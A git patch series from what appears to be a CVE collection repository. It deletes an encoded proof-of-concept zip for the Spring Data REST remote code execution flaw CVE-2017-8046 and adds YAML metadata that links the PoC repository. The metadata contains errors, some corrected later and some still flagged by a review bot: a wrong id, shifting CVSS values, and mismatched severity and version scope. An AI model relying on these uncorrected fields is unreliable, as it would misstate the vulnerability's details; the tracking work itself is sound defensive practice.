diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip deleted file mode 100644 index 078e924350cf580703b34d31477354a894198a3b..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12833 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 Date: Mon, 10 Apr 2023 10:57:34 +0000 Subject: [PATCH 102/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep deleted file mode 100644 index e69de29b..00000000 From bb228576ac7469e44a68416099e66e36c5f26a4b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:58:50 +0000 Subject: [PATCH 103/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20ya?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/ya/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/ya/.keep diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep new file mode 100644 index 00000000..e69de29b From b7a0f2795b73f2728d4ec4df3187bb841adb661e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:03:55 +0000 Subject: [PATCH 104/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
cve/java-spring/2017/ya/.keep | 0
cve/java-spring/2017/ya/CVE-2017-8046.yaml | 21 +++++++++++++++++++++
2 files changed, 21 insertions(+)
delete mode 100644 cve/java-spring/2017/ya/.keep
create mode 100644 cve/java-spring/2017/ya/CVE-2017-8046.yaml
diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
new file mode 100644
index 00000000..0d9f4311
--- /dev/null
+++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5398
+source:
+ https://github.com/m3ssap0/spring-break_cve-2017-8046
+info:
+ name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。
+ severity: high
+ description: |
+ 在2.5.12、2.6.7、3.0 RC3之前的Pivotal spring data rest版本、2.0.0M4之前的spring Boot版本以及Kay-RC3之前的spring data发布序列中,提交给spring data rest服务器的恶意PATCH请求可以使用特制的JSON数据来运行任意Java代码。
+ scope-of-influence:
+ Pivotal spring data rest 2.5.x (<2.5.12)
+ spring Boot 2.0.x (<2.0.0)
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2017-8046
+ cwe-id: CWE-494, CWE-79
+ cnvd-id: None
+ kve-id: None
+ tags: cve2017, spring-framework, RFD
\ No newline at end of file
From aa7c0961d9834ba091dc3617bbfa7e5351175256 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:04:16 +0000
Subject: [PATCH 105/109] update cve/java-spring/2017/ya/CVE-2017-8046.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
cve/java-spring/2017/ya/CVE-2017-8046.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
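Review bot: The `scope-of-influence` block in the new CVE-2017-8046.yaml disagrees with the `description` two lines above it: the description names Spring Data REST before 2.5.12, 2.6.7 and 3.0 RC3, Spring Boot before 2.0.0 M4 and Spring Data before Kay-RC3, while the scope lists only `Pivotal spring data rest 2.5.x (<2.5.12)` and `spring Boot 2.0.x (<2.0.0)`. The second entry is also self-contradictory, since no 2.0.x release is below 2.0.0; the description's own bound would read `spring Boot 2.0.x (<2.0.0 M4)`. I would list the same ranges the description gives, adding `Pivotal spring data rest 2.6.x (<2.6.7)`, `Pivotal spring data rest 3.0 (<3.0 RC3)` and `spring data (<Kay-RC3)`, so that consumers of the structured field and readers of the prose reach the same conclusion. Separately, the `name` field describes the Spring framework in general rather than naming this vulnerability; a one-line title of the issue would serve lookups better.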
diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
index 0d9f4311..2bef8c65 100644
--- a/cve/java-spring/2017/ya/CVE-2017-8046.yaml
+++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml
@@ -1,4 +1,4 @@
-id: CVE-2020-5398
+id: CVE-2017-8046
 source:
 https://github.com/m3ssap0/spring-break_cve-2017-8046
 info:
From d28c40771ef908fa2ddeda4af5dd66c518d8b480 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:04:30 +0000
Subject: [PATCH 106/109] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/java-?= =?UTF-8?q?spring/2017/ya=20=E4=B8=BA=20cve/java-spring/2017/yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml (100%)
diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
similarity index 100%
rename from cve/java-spring/2017/ya/CVE-2017-8046.yaml
rename to cve/java-spring/2017/yaml/CVE-2017-8046.yaml
From 5e5ed98e5eb089a5c5b4ec7e8f492fe55ee49bc3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 11:07:25 +0000
Subject: [PATCH 107/109] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
openkylin_list.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6..ece28b62 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -154,6 +154,7 @@ cve:
 redis:
 - CVE-2022-31144
 java-spring:
+ - CVE-2017-8046
 - CVE-2020-5398
 - CVE-2022-22965
 - CVE-2022-22963
From a4b145e95ff3b46fa60dbcefb15d726fe970af74 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Tue, 11 Apr 2023 09:02:45 +0000
Subject: [PATCH 108/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/java-spring/2017/CVE-2017-8046/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/java-spring/2017/CVE-2017-8046/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep
diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep
deleted file mode 100644
index e69de29b..00000000
From 0b2817e23160f21104cbba4d53ac5da28568e318 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Tue, 11 Apr 2023 09:12:54 +0000
Subject: [PATCH 109/109] update cve/java-spring/2017/yaml/CVE-2017-8046.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
index 2bef8c65..c6b5f608 100644
--- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
+++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml
@@ -12,10 +12,10 @@ info:
 reference:
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 7.5
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
 cve-id: CVE-2017-8046
- cwe-id: CWE-494, CWE-79
+ cwe-id: CWE-20
 cnvd-id: None
 kve-id: None
- tags: cve2017, spring-framework, RFD
\ No newline at end of file
+ tags: cve2017, spring-framework
\ No newline at end of file
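Review bot: Raising `cvss-score` to 9.8 leaves `severity: high` in the same file inconsistent, because 9.8 falls in the CVSS v3 "Critical" band (9.0–10.0) while "High" covers 7.0–8.9; the severity line sits above this hunk (it was written as `severity: high` when the file was created) and is not touched here, so the two fields now disagree. The fix is the single line `  severity: critical`. It would also help to add the source of the new vector and score to `reference`, since the hunk replaces both the vector string and the CWE but the only reference remains the MITRE entry, which carries neither.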